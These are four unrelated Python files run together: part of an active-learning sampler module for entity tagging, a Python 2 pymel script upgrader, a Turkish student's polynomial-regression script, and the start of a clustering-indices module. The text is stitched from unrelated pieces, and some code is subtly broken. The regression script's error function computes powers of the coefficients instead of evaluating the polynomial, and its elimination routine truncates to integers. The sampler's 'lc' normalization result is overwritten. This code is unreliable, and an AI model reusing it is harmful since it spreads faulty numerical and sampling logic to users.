kwargs["tagger"] embeddings = kwargs["embeddings"] self.predict(sentences, tagger) entities = self.get_entities(sentences, embeddings, tag_type) # If no entities, return random indices if not entities.entities: random_sampler = RandomSampler() return random_sampler(sentences, tag_type, query_number, token_based) scores = self.score(sentences, entities) sorted_sent_ids = self.sort(scores, order="ascend") queried_sent_ids = self.query( sentences, sorted_sent_ids, query_number, token_based ) return queried_sent_ids def score( self, sentences: List[Sentence], entities: Entities, kwargs: Optional[dict] = None, ) -> np.ndarray: """Calculate score for each sentence""" sentence_scores = [0] * len(sentences) diversities_per_sent = self.sentence_diversities(entities) for sent_id, score in diversities_per_sent.items(): sentence_scores[sent_id] = score return np.array(sentence_scores) def sentence_diversities(self, entities: Entities) -> Dict[int, float]: """Get diversity score of each sentence""" entities_per_label = entities.group_by_label entities_per_sentence = entities.group_by_sentence # Calculate similarities of all entities in one label similarities_per_label = self.similarity_matrix_per_label( entities_per_label ) # {"ORG": matrix, "PER": matrix} # Create index map # entity_id_map[label][sent_id][entity_id] = entity_id_in_label_entity_list sentence_count = max(entities_per_sentence.keys()) + 1 max_entity_count = max( [len(entities) for entities in entities_per_sentence.values()] ) entity_id_map = self.get_entity_id_map( entities_per_label, sentence_count, max_entity_count ) # Calculate diversity for each sentence sentence_scores = self.calculate_diversity( entities_per_sentence, entity_id_map, similarities_per_label ) return sentence_scores def calculate_diversity( self, entities_per_sentence: Dict[str, List[Entity]], entity_id_map: dict, similarities_per_label: dict, ) -> float: """Calculate diversity score for a sentence""" sentence_scores = {} for sent_id, sentence_entities in entities_per_sentence.items(): scores = [] for entity in sentence_entities: entity_id_in_label_list = entity_id_map[entity.label][entity.sent_id][ entity.id ] similarities = similarities_per_label[entity.label][ int(entity_id_in_label_list) ] scores.append(float(similarities.min())) sentence_score = sum(scores) / len(sentence_entities) sentence_scores[sent_id] = sentence_score return sentence_scores def get_entity_id_map( self, entities_per_label: Dict[str, List[Entity]], sentence_count: int, max_entity_count: int, ) -> Dict[str, np.ndarray]: """Get index map of entity from sentence id to the id in entity_per_label Args: entities_per_label (Dict[str, List[Entity]]): Entity list in each label. sentence_count (int): Sentences count number, used for create matrix. max_entity_count (int): Max entities count in every sentence, used for create matrix. Returns: Dict[str, np.ndarray]: An index map convert entity id from sentence id to the id label entities list e.g. map[label][sent_id][entity_id] = entity_id_in_label_entities_list """ entity_id_map = {} for label, label_entities in entities_per_label.items(): if label not in entity_id_map: entity_id_map[label] = np.ones((sentence_count, max_entity_count)) for i, entity in enumerate( label_entities ): # entity id in label entities list print(i, entity, entity.sent_id, entity.id) entity_id_map[label][entity.sent_id][entity.id] = i print(entity_id_map) return entity_id_map def similarity_matrix_per_label( self, entities_per_label: Dict[str, List[Entity]] ) -> Dict[str, np.ndarray]: """Calculate similarity matrix of entities in each label""" similarity_matrix_per_label = {} for label, label_entities in entities_per_label.items(): vectors = torch.stack([entity.vector for entity in label_entities]) similarities = self.similarity_matrix(vectors, vectors) similarity_matrix_per_label[label] = ( similarities.cpu().detach().numpy().copy() ) return similarity_matrix_per_label class ClusterSimilaritySampler(BaseSampler): """Distribute similarity sampler We create cluster sampling as a kind of diversity sampling method. Different with most of sampling methods that are based on sentence level, Cluster sampling method is implemented on entity level. Cluster sampling classify all entity into cluster, and find the centen in each cluster. We calculate the similarity between center and entity in the same cluster, the low similarity pair means high diversity. Args: BaseSampler: BaseSampler class. """ def __call__( self, sentences: List[Sentence], tag_type: str, query_number: int, token_based: bool = False, **kwargs, ) -> List[int]: """Distribute similarity sampling workflow Args: sentences (List[Sentence]): Sentences in data pool. tag_type (str): Tag type to predict. query_number (int): batch query number. token_based (bool, optional): If true, using query number as token number to query data. If false, using query number as sentence number to query data. kwargs: tagger: The tagger after training embeddings: The embeddings method kmeans_params (dict): Parameters for clustering, detail on sklearn.cluster.KMeans. e.g. {"n_clusters": 8, "n_init": 10, "random_state": 0} "n_clusters": The number of cluster (label types except "O") "n_init": Number of time the k-means algorithm will be run with different centroid seeds. "random_state": Determines random number generation for centroid initialization. Returns: List[int]: Queried sentence ids. """ tagger = kwargs["tagger"] embeddings = kwargs["embeddings"] self.predict(sentences, tagger) entities = self.get_entities(sentences, embeddings, tag_type) # If no entities, return random indices if not entities.entities: random_sampler = RandomSampler() return random_sampler(sentences, tag_type, query_number, token_based) scores = self.score(sentences, entities, kwargs) sorted_sent_ids = self.sort(scores, order="ascend") queried_sent_ids = self.query( sentences, sorted_sent_ids, query_number, token_based ) return queried_sent_ids def score( self, sentences: List[Sentence], entities: Entities, kwargs: Optional[dict] = None, ) -> np.ndarray: """Calculate score for each sentence""" kmeans_params = self.get_kmeans_params(kwargs) sentence_scores = [0] * len(sentences) cluster_centers_matrix, entity_cluster_nums = self.kmeans( entities.entities, kmeans_params ) entities = self.assign_cluster(entities, entity_cluster_nums) diversities_per_sent = self.sentence_diversities( entities, cluster_centers_matrix ) for sent_id, score in diversities_per_sent.items(): sentence_scores[sent_id] = score return np.array(sentence_scores) def get_kmeans_params(self, kwargs: dict) -> bool: """Check the sampler type is availabel or not.""" if "kmeans_params" not in kwargs or "n_clusters" not in kwargs["kmeans_params"]: output = ( "You have to provide 'kmeans_params' parameter to use ClusterSimilaritySampler." " 'kmeans_params' must contain 'n_clusters', which means number of label types in dataset except 'O'." " For example, kmeans_params={'n_clusters': 8, 'n_init': 10, 'random_state': 0}}" ) raise NameError(output) kmeans_params = kwargs["kmeans_params"] return kmeans_params def sentence_diversities( self, entities: Entities, cluster_centers_matrix: np.ndarray ) -> Dict[int, float]: """Get diversity score of each sentence""" entities_per_cluster = entities.group_by_cluster entities_per_sentence = entities.group_by_sentence return { sent_id: self.calculate_diversity( sent_entities, entities_per_cluster, cluster_centers_matrix ) for sent_id, sent_entities in entities_per_sentence.items() } def assign_cluster( self, entities: Entities, entity_cluster_nums: np.ndarray ) -> Entities: """Assign cluster number to Entity""" new_entities = Entities() for i, entity in enumerate(entities.entities): entity.cluster = entity_cluster_nums[i] new_entities.add(entity) return new_entities def calculate_diversity( self, sentence_entities: List[Entity], entities_per_cluster: Dict[int, List[Entity]], cluster_centers_matrix: np.ndarray, ) -> float: """Calculate diversity score for a sentence""" scores = [] cluster_centers_matrix = torch.tensor(cluster_centers_matrix) for entity in sentence_entities: cluster_center_vector = cluster_centers_matrix[entity.cluster] vectors = torch.stack( [entity.vector for entity in entities_per_cluster[entity.cluster]] ) similarities = self.similarity_matrix( torch.stack([cluster_center_vector]), vectors ) score = torch.min(similarities) scores.append(float(score)) return sum(scores) / len(sentence_entities) def kmeans( self, entities: List[Entity], kmeans_params: dict ) -> Tuple[np.ndarray, np.ndarray]: """K-Means cluster to get cluster centers and entity cluster""" if "n_clusters" not in kmeans_params: raise KeyError("n_clusters is not found.") if "random_state" not in kmeans_params: kmeans_params["random_state"] = 0 kmeans = KMeans(**kmeans_params) entity_embedding_matrix = [entity.vector for entity in entities] entity_embedding_matrix = torch.stack( entity_embedding_matrix ) # e.g. shape is (36, 100) kmeans.fit(entity_embedding_matrix) cluster_centers_matrix = kmeans.cluster_centers_ # e.g. shape is (4, 100) entity_cluster_nums = ( kmeans.labels_ ) # e.g. [0, 2, 3, 1, ...], the number is the indices of index in cluster_centers_matrix return cluster_centers_matrix, entity_cluster_nums class CombinedMultipleSampler(BaseSampler): """Multiple similarity sampler Uncertainty-based samplers do not take full advantage of entity information. The proposed token-level diversity based sampler can fully utilize the entity information. So we combine diversity sampler and uncertainty-based sampler together to improve the active learning performance. Args: BaseSampler: BaseSampler class. """ @property def available_sampler_types(self): """Available samplers""" available_sampler_types = ["lc_ds", "lc_cs", "mnlp_ds", "mnlp_cs"] return available_sampler_types @property def available_combined_types(self): """Available combined type""" available_combined_types = ["series", "parallel"] return available_combined_types def __call__( self, sentences: List[Sentence], tag_type: str, query_number: int, token_based: bool = False, **kwargs, ) -> List[int]: """Combined multiple sampler sampling workflow Args: sentences (List[Sentence]): Sentences in data pool. tag_type (str): Tag type to predict. query_number (int): batch query number. token_based (bool, optional): If true, using query number as token number to query data. If false, using query number as sentence number to query data. kwargs: sampler_type (str): Which kind of sampler to use. Available types are "lc_ds", "lc_cs", "mnlp_ds", "mnlp_cs" - "lc_ds" means LeastConfidenceSampler and DistributeSimilaritySampler. - "lc_cs" means LeastConfidenceSampler and ClusterSimilaritySampler. - "mnlp_ds" means MaxNormLogProbSampler and DistributeSimilaritySampler. - "mnlp_cs" means MaxNormLogProbSampler and ClusterSimilaritySampler. combined_type (str): The combined method of different samplers. Available types are "series", "parallel" - "series" means run one sampler first and then run the second one. - "parallel" means run two samplers together. If sampler_type is "lc_ds", it means first run lc and then run ds. If reverse parameter is provided, it runs ds first and then lc. reverse (bool): The running order when combined type is "series" tagger: The tagger after training embeddings: The embeddings method kmeans_params (dict): Parameters for clustering, detail on sklearn.cluster.KMeans. e.g. {"n_clusters": 8, "n_init": 10, "random_state": 0} "n_clusters": The number of cluster (label types except "O") "n_init": Number of time the k-means algorithm will be run with different centroid seeds. "random_state": Determines random number generation for centroid initialization. Returns: List[int]: Queried sentence ids. """ sampler_type = self.get_sampler_type(kwargs) combined_type = self.get_combined_type(kwargs) scaler = self.get_scaler(kwargs) # Get samplers uncertainty_sampler, diversity_sampler = self.get_samplers(sampler_type) # Combine scores if combined_type == "series": uncertainty_sampler_queried_sent_ids = uncertainty_sampler( sentences, tag_type, 2 * query_number, token_based, **kwargs ) uncertainty_sampler_queried_sents = [ sentences[i] for i in uncertainty_sampler_queried_sent_ids ] queried_sent_ids = diversity_sampler( uncertainty_sampler_queried_sents, tag_type, query_number, token_based, **kwargs, ) return queried_sent_ids # The combine_type == "parallel" tagger = kwargs["tagger"] embeddings = kwargs["embeddings"] self.predict(sentences, tagger) entities = self.get_entities(sentences, embeddings, tag_type) # If no entities, return random indices if not entities.entities: random_sampler = RandomSampler() return random_sampler(sentences, tag_type, query_number, token_based) # Calculate scores uncertainty_scores = uncertainty_sampler.score(sentences, tagger) diversity_scores = diversity_sampler.score(sentences, entities, kwargs) # Normalize scores if "lc" in sampler_type: # reverse lc order for ascend setup below scores = self.normalize_scores( -uncertainty_scores, diversity_scores, scaler ) scores = self.normalize_scores(uncertainty_scores, diversity_scores, scaler) sorted_sent_ids = self.sort(scores, order="ascend") queried_sent_ids = self.query( sentences, sorted_sent_ids, query_number, token_based ) return queried_sent_ids def normalize_scores( self, uncertainty_scores: np.ndarray, diversity_scores: np.ndarray, scaler: BaseEstimator, ) -> np.ndarray: """Normalize two kinds of scores Args: uncertainty_scores (np.ndarray): Scores calculated by uncertainty_sampler diversity_scores (np.ndarray): Scores calculated by diversity_sampler Returns: np.ndarray: Normalized score """ concatenate_scores = np.stack([uncertainty_scores, diversity_scores]) normalized_scores = scaler.fit_transform(np.transpose(concatenate_scores)) return normalized_scores.sum(axis=1) def get_samplers(self, sampler_type: str) -> Tuple[BaseSampler, BaseSampler]: """Get specific samplers""" if sampler_type == "lc_ds": uncertainty_sampler, diversity_sampler = ( LeastConfidenceSampler(), DistributeSimilaritySampler(), ) elif sampler_type == "lc_cs": uncertainty_sampler, diversity_sampler = ( LeastConfidenceSampler(), ClusterSimilaritySampler(), ) elif sampler_type == "mnlp_ds": uncertainty_sampler, diversity_sampler = ( MaxNormLogProbSampler(), DistributeSimilaritySampler(), ) elif sampler_type == "mnlp_cs": uncertainty_sampler, diversity_sampler = ( MaxNormLogProbSampler(), ClusterSimilaritySampler(), ) else: uncertainty_sampler, diversity_sampler = ( LeastConfidenceSampler(), DistributeSimilaritySampler(), ) return uncertainty_sampler, diversity_sampler def get_sampler_type(self, kwargs: dict) -> bool: """Check the sampler type is availabel or not.""" if "sampler_type" not in kwargs: sampler_type = "lc_ds" print("sampler_type is not found. Default use 'lc_ds' sampler type") return sampler_type sampler_type = kwargs["sampler_type"] if sampler_type not in self.available_sampler_types: raise NameError( f"sampler_type is not found. sampler_type must be one of {self.available_sampler_types}" ) return sampler_type def get_combined_type(self, kwargs: dict) -> bool: """Check the combined type is availabel or not.""" if "combined_type" not in kwargs: combined_type = "parallel" print("combined_type is not found. Default use 'parallel' combined type") return combined_type combined_type = kwargs["combined_type"] if combined_type not in self.available_combined_types: raise NameError( f"combined_type is not found. combined_type must be one of {self.available_combined_types}" ) return combined_type def get_scaler(self, kwargs: dict) -> bool: """Get scaler""" if "scaler" not in kwargs: scaler = MinMaxScaler() print("scaler is not found. Default use 'MinMaxScaler()'") return scaler return kwargs["scaler"]
""" This module provides functions for upgrading scripts from pymel 0.9 to 1.0. It fixes two types non-compatible code: - pymel.all is now the main entry-point for loading all pymel modules - import pymel --> import pymel.all as pymel - import pymel as pm --> import pymel.all as pm - from pymel import * --> from pymel.all import * - pymel.mayahook.versions.Version is now pymel.versions To use, run this in a script editor tab:: import pymel.tools.upgradeScripts pymel.tools.upgradeScripts.upgrade() This will print out all the modules that will be upgraded. If everything looks good run the following to perform the upgrade:: pymel.tools.upgradeScripts.upgrade(test=False) Once you're sure that the upgrade went smoothly, run:: pymel.tools.upgradeScripts.cleanup() This will delete the backup files. If you need to undo the changes, run:: pymel.tools.upgradeScripts.undo() Keep in mind that this will restore files to their state at the time that you ran ``upgrade``. If you made edits to the files after running ``upgrade`` they will be lost. """ import sys, os.path, re, shutil from collections import defaultdict import pymel.core # we don't use this, but it ensures that maya and sys.path are properly initialized #IMPORT_RE = re.compile( '(\s*import\s+(?:[a-zA-Z0-9_.,\s]+,\s*)?)(pymel(?:[.][a-zA-Z][a-zA-Z0-9_]+)*)((?:\s*,\s*[a-zA-Z][a-zA-Z0-9_.,\s]+)?(?:\s+as\s+([a-zA-Z][a-zA-Z0-9_]+))?(?:\s*))$' ) #IMPORT_RE = re.compile( r'(\s*import\s+(?:.*))(\bpymel(?:[.][a-zA-Z][a-zA-Z0-9_]+)*)(?:\s+as\s+([a-zA-Z][a-zA-Z0-9_]+))?(.*)$' ) IMPORT_RE = re.compile( r'(?P<start>\s*import\s+.*)(?P<pymel>\bpymel(?:[.][a-zA-Z][a-zA-Z0-9_]+)*\b)(?P<end>(?:\s+as\s+(?P<details>[a-zA-Z][a-zA-Z0-9_]+))?(?:.|\s)*)$' ) FROM_RE = re.compile( r'(?P<start>\s*from\s+)(?P<pymel>pymel(?:[.][a-zA-Z][a-zA-Z0-9_]+)*)(?P<end>(?:\s+import\s+(?P<details>[*]|(?:[a-zA-Z0-9_.,\s]+)))(?:\s*))$' ) #([a-zA-Z][a-zA-Z_.]+)([a-zA-Z][a-zA-Z_.]+) LOGNAME = 'pymel_upgrade.log' BACKUPEXT = '.pmbak' last_logfile = None def _getMayaAppDir(): if not os.environ.has_key('MAYA_APP_DIR') : home = os.environ.get('HOME', os.environ.get('USERPROFILE', None) ) if not home : return None else : if sys.platform == 'darwin': return os.path.join(home, 'Library/Preferences/Autodesk/maya') else: return os.path.join(home, 'maya') return os.environ['MAYA_APP_DIR'] objects = [ ( 'Version', re.compile('([a-zA-Z_][a-zA-Z0-9_.]+[.])?(Version[.])([a-zA-Z_][a-zA-Z0-9_]*)'), ('pymel', 'pymel.version', 'pymel.internal', 'pymel.internal.version' ), 'versions', { 'current' : 'current()', 'v85sp1' : 'v85_SP1', 'v2008sp1' : 'v2008_SP1', 'v2008ext2' : 'v2008_EXT2', 'v2009ext1' : 'v2009_EXT1', 'v2009sp1a' : 'v2009_SP1A' } ) ] PREFIX = 1 OBJECT = 2 SUFFIX = 3 class LogError(ValueError):pass def _getLogfile(logfile, read=True): if logfile is None: global last_logfile if last_logfile: logfile = last_logfile if logfile is None: baseDir = _getMayaAppDir() if not baseDir: baseDir = os.curdir logfile = logfile = os.path.join(baseDir, LOGNAME) if read and not os.path.isfile( logfile ): raise LogError, "could not find an existing %s. please pass the path to this file, which was generated during upgrade" % LOGNAME return os.path.realpath(logfile) def upgradeFile(filepath, test=True): """ upgrade a single file """ try: f = open(filepath) lines = f.readlines() f.close() except Exception, e: print str(e) return False, False modified = False uses_pymel = False pymel_namespaces = defaultdict(set) rev_pymel_namespaces = defaultdict(set) for i, line in enumerate(lines): m = IMPORT_RE.match(line) mode = None if not m: m = FROM_RE.match(line) mode = 'from' else: mode = 'import' if m: #start, pymel_module, end, details = m.groups() d= m.groupdict() start = d['start'] pymel_module = d['pymel'] end = d['end'] details = d['details'] if pymel_module == 'pymel.all': print "skipping. already uses 'pymel.all':", filepath return False, True uses_pymel = True if pymel_module == 'pymel': # import pymel, foo --> import pymel.all as pymel, foo # import pymel as pm, foo --> import pymel.all as pm, foo # from pymel import foo --> from pymel.all import foo as_name = ' as pymel' if mode == 'import' and not details else '' lines[i] = start + 'pymel.all' + as_name + end modified = True if details: details = details.strip() if mode == 'import': if details: pymel_namespaces[pymel_module].add(details) # pymel.version -> version # import pymel.internal as internal # 'internal' -> 'pymel.internal' rev_pymel_namespaces[details].add(pymel_module) else: # 'import pymel' pymel_namespaces[pymel_module].add(pymel_module) # import pymel.internal # 'pymel.internal' -> 'pymel.internal' rev_pymel_namespaces[pymel_module].add(pymel_module) elif mode == 'from': details = '' if details == '*' else details for detail in details.split(','): if detail: module = pymel_module + '.' + detail else: module = pymel_module pymel_namespaces[pymel_module].add(detail) # from pymel import internal # 'internal' -> 'pymel.internal' # from pymel import * # '' -> 'pymel' rev_pymel_namespaces[detail].add(module) if uses_pymel: for obj, reg, obj_namespaces, replace, attr_remap in objects: parts = reg.split(line) if len(parts) > 1: #print parts for j in range(0, len(parts)-1, 4): try: ns = parts[j+PREFIX] except IndexError, err: pass else: ns = ns if ns else '' #print '\t', `ns` parts[j+PREFIX] = ns #print "checking namespace", `ns`, 'against', dict(rev_pymel_namespaces) for namespace, orig_namespaces in rev_pymel_namespaces.iteritems(): if namespace == '' or ns == namespace or ns.startswith(namespace + '.'): for orig_namespace in orig_namespaces: if namespace == '': expanded_ns = orig_namespace + '.' + ns else: expanded_ns = ns.replace(namespace, orig_namespace) #print 'expanded', expanded_ns if expanded_ns.rstrip('.') in obj_namespaces: #print "found namespace", `ns`, `expanded_ns` try: pmns = list(pymel_namespaces['pymel'])[0] except IndexError: print "warning: %s: no pymel namespace was found" % filepath else: if pmns =='': parts[j+PREFIX] = replace + '.' else: parts[j+PREFIX] = pmns + '.' + replace + '.' parts[j+OBJECT] = None attr = parts[j+SUFFIX] parts[j+SUFFIX] = attr_remap.get(attr, attr) break lines[i] = ''.join( [ x for x in parts if x is not None] ) #print 'before:', `line` #print 'after: ', `lines[i]` success = True if modified: if not test: tmpfile = filepath + '.tmp' try: f = open(tmpfile, 'w') f.writelines(lines) f.close() except (IOError, OSError), err: print "error writing temporary file: %s: %s" % ( tmpfile, err) success = False if success: try: os.rename(filepath, filepath + BACKUPEXT) except (IOError, OSError), err: print "error backing up file %s to %s.pmbak: %s" % ( filepath, filepath, err) success = False else: try: os.rename(tmpfile, filepath) except (IOError, OSError), err: print "error renaming temp file: %s" % ( err) success = False print "attempting to restore original file" try: os.rename(filepath + BACKUPEXT, filepath) except OSError, err: print "could not restore original: %s" % ( err) return modified, success def upgrade(logdir=None, test=True, excludeFolderRegex=None, excludeFileRegex=None, verbose=False, force=False): """ search PYTHONPATH (aka. sys.path) and MAYA_SCRIPT_PATH for python files using pymel that should be upgraded Keywords -------- :param logdir: directory to which to write the log of modified files :param test: when run in test mode (default) no files are changed :param excludeFolderRegex: a regex string which should match against a directory's basename, without parent path :param excludeFileRegex: a regex string which should match against a file's basename, without parent path or extension :param verbose: print more information during conversion :param force: by default, `upgrade` will skip files which already have already been processed, as determined by the existence of a backup file with a .pmbak extension. setting force to True will ignore this precaution """ if test: print "running in test mode. set test=False to enable file editing" if excludeFolderRegex: assert isinstance(excludeFolderRegex, basestring), "excludeFolderRegex must be a string" if excludeFileRegex: assert isinstance(excludeFileRegex, basestring), "excludeFileRegex must be a string" logfile = os.path.join(_getLogfile(logdir, read=False)) try: log = open(logfile, 'w' ) except (IOError, OSError), err: print "could not create log file at %s. please pass a writable directory to 'logdir' keyword: %s" % ( logdir, err) return global last_logfile last_logfile = logfile completed = [] try: for path in sys.path + os.environ['MAYA_SCRIPT_PATH'].split(os.pathsep): #for path in ['/Volumes/luma/_globalSoft/dev/chad/python/pymel']: for root, dirs, files in os.walk(path): for f in files: if f.endswith('.py') and not f.startswith('.'): if not excludeFileRegex or not re.match( excludeFileRegex, f[:-3] ): fpath = os.path.realpath(os.path.join(root,f)) if fpath not in completed: if os.path.exists(fpath+BACKUPEXT) and not force: print "file has already been converted. skipping: %s (use force=True to force conversion)" % fpath if not test: # keep as part of the log so that undo will work log.write( fpath + '\n' ) else: modified, stat = upgradeFile( fpath, test ) if modified and stat: print 'needs upgrading:' if test else 'upgraded:', fpath if not test: log.write( fpath + '\n' ) completed.append(fpath) elif verbose: print "skipping", os.path.join(root,f) #print 'before', root, dirs # dirs must be modified in-place i = 0 tmpdirs = dirs[:] for dir in tmpdirs: #print '\t', `dir` if dir.startswith('.') or dir == 'pymel' \ or not os.path.isfile(os.path.join(root, dir, '__init__.py')) \ or ( excludeFolderRegex and re.match( excludeFolderRegex, dir ) ): del dirs[i] if verbose: print "skipping", os.path.join(root, dir) else: i += 1 #print 'after', root, dirs except Exception, err: import traceback traceback.print_exc() finally: if not test: print "writing log to %s" % logfile log.close() if test: print "test complete" print "to upgrade the listed files run:\nupgrade(test=False)" else: print "upgrade complete. the original files have been renamed with a %s extension\n" % BACKUPEXT print "to remove the backed-up original files run:\ncleanup(%r)\n" % logfile print "to restore the original files run:\nundo(%r)" % logfile def undoFile(filepath): """ undo a single file """ backup = filepath + BACKUPEXT if os.path.isfile(backup): try: os.rename(backup, filepath ) print "restored", filepath except (IOError, OSError), err: print "error restoring file %s.pmbak to %s: %s" % ( filepath, filepath, err) return False else: print "error restoring %s: backup file does not exist: %s. skipping" % ( filepath, backup) return True def _findbackups(): undofiles = [] for path in sys.path + os.environ['MAYA_SCRIPT_PATH'].split(os.pathsep): for root, dirs, files in os.walk(path): #print root for f in files: if f.endswith('.py' + BACKUPEXT) and not f.startswith('.'): fpath = os.path.realpath(os.path.join(root,f.rstrip(BACKUPEXT))) #print "adding", fpath undofiles.append(fpath) i = 0 tmpdirs = dirs[:] for dir in tmpdirs: #print '\t', `dir` if dir.startswith('.') or dir == 'pymel' \ or not os.path.isfile(os.path.join(root, dir, '__init__.py')): del dirs[i] else: i += 1 return undofiles def _getbackups(logfile, force): try: log = open(_getLogfile(logfile), 'r' ) except LogError, e: if force: undofiles = _findbackups() else: raise LogError, str(e) + '.\nif you lost your logfile, set force=True to search sys.path for *.pmbak files to restore instead.' else: undofiles = [ x.rstrip() for x in log.readlines() if x] log.close() return undofiles def undo(logfile=None, force=False): """ undo converted files to their original state and remove backups :param logfile: the logfile containing the list of files to restore. if None, the logfile will be determined in this order: 1. last used logfile (module must have remained loaded since running upgrade) 2. MAYA_APP_DIR 3. current working directory :param force: if you've lost the original logfile, setting force to True will cause the function to recurse sys.path looking for backup files to restore instead of using the log. if your sys.path is setup exactly as it was during upgrade, all files should be restored, but without the log it is impossible to be certain. """ undofiles = _getbackups(logfile, force) try: for file in undofiles: undoFile(file) print 'done' except Exception, err: import traceback traceback.print_exc() def cleanup(logfile=None, force=False): """ remove backed-up files. run this when you are certain that the upgrade went smoothly and you no longer need the original backups. :param logfile: the logfile containing the list of files to restore. if None, the logfile will be determined in this order: 1. last used logfile (module must have remained loaded since running upgrade) 2. MAYA_APP_DIR 3. current working directory :param force: if you've lost the original logfile, setting force to True will cause the function to recurse sys.path looking for backup files to cleanup instead of using the log. if your sys.path is setup exactly as it was during upgrade, all files should be restored, but without the log it is impossible to be certain. """ undofiles = _getbackups(logfile, force) try: for file in undofiles: bkup = file + BACKUPEXT try: print "removing", bkup os.remove(bkup) except (IOError, OSError), err: print "error removing file %s: %s" % ( bkup, err) print 'done' except Exception, err: import traceback traceback.print_exc()
<reponame>yigitcanustek/blm2010 #Yeşim Şekerciler-140401067 import math def gauss(r): lenrow = len(r) lencol = len(r[0]) m = lenrow-1 k = 0 z = 0 for j in range(lenrow): m = lenrow-1 k = j z = j for i1 in range(lenrow-1): if (r[j][k]==0): continue coeff = r[m][z] / r[j][k] for i in range(lencol): x = r[j][i] if x == r[m][i]: continue r[m][i] -= coeff*x m-=1 k +=1 z +=1 for i in range(1,lenrow): coeff = r[i][i]/r[0][i] for j in range(lencol): r[0][j] -= (r[i][j]/coeff) for i in range(lenrow-1,-1,-1): for j in range(lencol-1,-1,-1): if j != lencol-1: r[i][j] = int(r[i][j]/r[i][i]) continue r[i][j] /= r[i][i] a = [] for i in range(lenrow): a.append(r[i][lencol-1]) return a def polinom(y,derece): sumy = 0 list1 = y n = len(list1) for i in list1: sumy += int(i) x_list = [0 for i in range(derece*2+1)] xi = 0 for i in range(derece*2+1): for j in range(n): xi += pow(j+1,i) x_list[i] = xi xi = 0 a = [[0 for i in range(derece+1)] for i in range(derece+1)] #ax = b tipindeki denklemin x değerlerini içeren matris c = [0 for i in range(derece+1)] #ax = b tipindeki denklemin b değerleri c[0] = sumy for i in range(1,derece+1): c[i] = int(x_list[i] * sumy) for i in range(derece+1): for j in range(derece+1): a[i][j] = int(x_list[j+i]) a[i].append(c[i]) return gauss(a) def err(y,polinom): for i in range(len(y)): y[i] = float(y[i]) err = [] err_ = 0 hata = [] for i in range(len(y)): err_ = polinom[0] for j in range(1,len(polinom)): err_ += pow(polinom[j],j) err.append(err_) for i in range(len(y)): hata.append(abs((abs(err[i])-y[i])/err[i])) return (sum(hata)/len(y)) with open('veriler.txt','r') as f: y = f.readlines() err1 = [err(y,polinom(y,i)) for i in range(1,7)] with open('sonuc.txt','w') as f1: for i in range(1,7): f1.writelines("%s. dereceden polinom\n" % i) f1.writelines("{0}\n".format(polinom(y,i))) f1.writelines("{0}. dereceden polinomun r değeri:{1}\n\n".format( i , err(y,polinom(y,i)))) f1.writelines("\n") f1.writelines("En uygun polinom:{0}. dereceden polinom\nr değeri:{1}\n".format(err1.index(max(err1))+1,max(err1))) for j in range(0,len(y),10): for i in range(1,7): f1.writelines(("{0}. dereceden polinom {1} ile {2} verileri arası\n").format(i,j,j+10)) f1.writelines("{0}\n".format(polinom(y[j:j+10],i))) f1.writelines("{0} ile {1} verileri arası {2}. dereceden polinomun r değeri:{3}\n\n".format( j,j+10,i , err(y[j:j+10],polinom(y[j:j+10],i))))
<gh_stars>1-10 """ Module containing functions for clustering and cluster indices generation from samples of data """ import logging import numpy as np import tqdm from .utils import read_bag_file, extract_bag_index from .internal_indices import InternalIndices, INTERNAL_INDICES_METHOD_NAMES_DICT from .external_indices import ExternalIndices, EXTERNAL_INDICES_METHOD_NAMES_DICT logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt = '%m/%d/%Y %H:%M:%S', level = logging.INFO) logger = logging.getLogger(__name__) KMEANS_CHOOSEN_CLUSTER_INDICES = { 'internal_indices' : [ # 'WGSS', # 'BGSS', # 'Ball-Hall', # 'Banfeld-Raftery', # 'Calinski-Harabasz', # 'Det-Ratio', # 'Ksq-DetW', # 'Log-Det-Ratio', # 'Log-SS-Ratio', ## 'Scott-Symons', 'Silhouette', # 'Trace-WiB', 'C', 'Dunn', # 'Davies-Bouldin', # 'Ray-Turi', # 'PBM', 'Score', ], 'external_indices' : [ 'Entropy', 'Purity', 'Precision', 'Recall', 'F', 'Weighted-F', 'Folkes-Mallows', 'Rand', 'Adjusted-Rand', 'Adjusted-Mutual-Info', 'Normalized-Mutual-Info', 'Homogeneity', 'Completeness', 'V-Measure', 'Jaccard', '<NAME>̂', 'Kulczynski', # 'McNemar', 'Phi', 'Russel-Rao', 'Rogers-Tanimoto', 'Sokal-Sneath1', 'Sokal-Sneath2', ], } HIERARCHICAL_CHOOSEN_CLUSTER_INDICES = { 'internal_indices' : [ # 'WGSS', # 'BGSS', # 'Ball-Hall', # 'Banfeld-Raftery', # 'Calinski-Harabasz', # 'Det-Ratio', # 'Ksq-DetW', # 'Log-Det-Ratio', # 'Log-SS-Ratio', ## 'Scott-Symons', 'Silhouette', # 'Trace-WiB', 'C', 'Dunn', # 'Davies-Bouldin', # 'Ray-Turi', # 'PBM', 'Score', ], 'external_indices' : [ 'Entropy', 'Purity', 'Precision', 'Recall', 'F', 'Weighted-F', 'Folkes-Mallows', 'Rand', 'Adjusted-Rand', 'Adjusted-Mutual-Info', 'Normalized-Mutual-Info', 'Homogeneity', 'Completeness', 'V-Measure', 'Jaccard', '<NAME>̂', 'Kulczynski', # 'McNemar', 'Phi', 'Russel-Rao', 'Rogers-Tanimoto', 'Sokal-Sneath1', 'Sokal-Sneath2', ], } SPECTRAL_CHOOSEN_CLUSTER_INDICES = { 'internal_indices' : [ # 'WGSS', # 'BGSS', # 'Ball-Hall', # 'Banfeld-Raftery', # 'Calinski-Harabasz', # 'Det-Ratio', # 'Ksq-DetW', # 'Log-Det-Ratio', # 'Log-SS-Ratio', ## 'Scott-Symons', 'Silhouette', # 'Trace-WiB', 'C', 'Dunn', 'Davies-Bouldin', 'Ray-Turi', # 'PBM', 'Score', ], 'external_indices' : [ 'Entropy', 'Purity', 'Precision', 'Recall', 'F', 'Weighted-F', 'Folkes-Mallows', 'Rand', 'Adjusted-Rand', 'Adjusted-Mutual-Info', 'Normalized-Mutual-Info', 'Homogeneity', 'Completeness', 'V-Measure', 'Jaccard', 'Hubert Γ̂', 'Kulczynski', # 'McNemar', 'Phi', 'Russel-Rao', 'Rogers-Tanimoto', 'Sokal-Sneath1', 'Sokal-Sneath2', ], } HDBSCAN_CHOOSEN_CLUSTER_INDICES = { 'internal_indices' : [ # 'WGSS', # 'BGSS', # 'Ball-Hall', # 'Banfeld-Raftery', # 'Calinski-Harabasz', # 'Det-Ratio', # 'Ksq-DetW', # 'Log-Det-Ratio', 